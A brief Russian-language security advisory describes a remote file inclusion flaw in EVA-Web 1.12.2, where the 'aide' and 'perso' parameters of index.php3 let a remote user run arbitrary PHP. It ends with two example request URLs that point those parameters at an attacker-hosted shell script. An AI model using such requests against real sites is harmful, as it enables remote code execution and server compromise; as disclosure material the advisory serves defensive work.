Программа: EVA-Web 1.12.2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметрах «aide» и «perso» сценарием index.php3. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

www.victim.com/[path to webapp]/eva/index.php3?aide=http://www.ursite.com/shell.txt?
www.victim.com/[path to webapp]/eva/index.php3?perso=http://www.ursite.com/shell.txt?



Оставить мнение